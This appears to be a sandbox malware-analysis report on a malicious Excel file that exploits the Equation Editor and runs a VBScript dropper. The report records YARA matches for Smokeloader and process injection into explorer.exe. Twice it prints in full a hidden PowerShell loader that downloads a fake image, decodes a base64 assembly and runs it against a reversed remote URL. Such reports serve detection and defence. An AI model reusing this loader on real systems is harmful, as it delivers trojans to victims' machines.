            Source: 40830001.xlsStream path 'MBD0018266D/\x1Ole' : https://crash.sh/udMVqm--C@F?n^fVHD}0I9tPD'uN|)"k'^CuR@S6B"n:7E{@%9lwSg2'3'l?X %aXB.lL<F=ZBqPB\ ^TMD.h7lSRpirkvKnPiDgAv75NF[82?8vJSpQtRjW
            Source: ~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\dagifhd D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 000C8801 appears 40 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 000C7F70 appears 32 times
            Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 2984, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2892, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winXLS@32/34@13/4
            Source: C:\Windows\explorer.exeCode function: 15_2_02803BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,15_2_02803BF4
            Source: C:\Windows\explorer.exeCode function: 15_2_028035E8 CoCreateInstance,15_2_028035E8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\96630000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR862F.tmpJump to behavior
            Source: 40830001.xlsOLE indicator, Workbook stream: true
            Source: 96630000.0.drOLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P............. .......$........t.........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P............. .......`........t.........................s............................................Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: 40830001.xlsReversingLabs: Detection: 26%
            Source: 40830001.xlsVirustotal: Detection: 9%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {4EEBF1C0-00CF-4920-A83B-C678B0B7FDEB} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\dagifhd C:\Users\user\AppData\Roaming\dagifhd
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\dagifhd C:\Users\user\AppData\Roaming\dagifhd
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
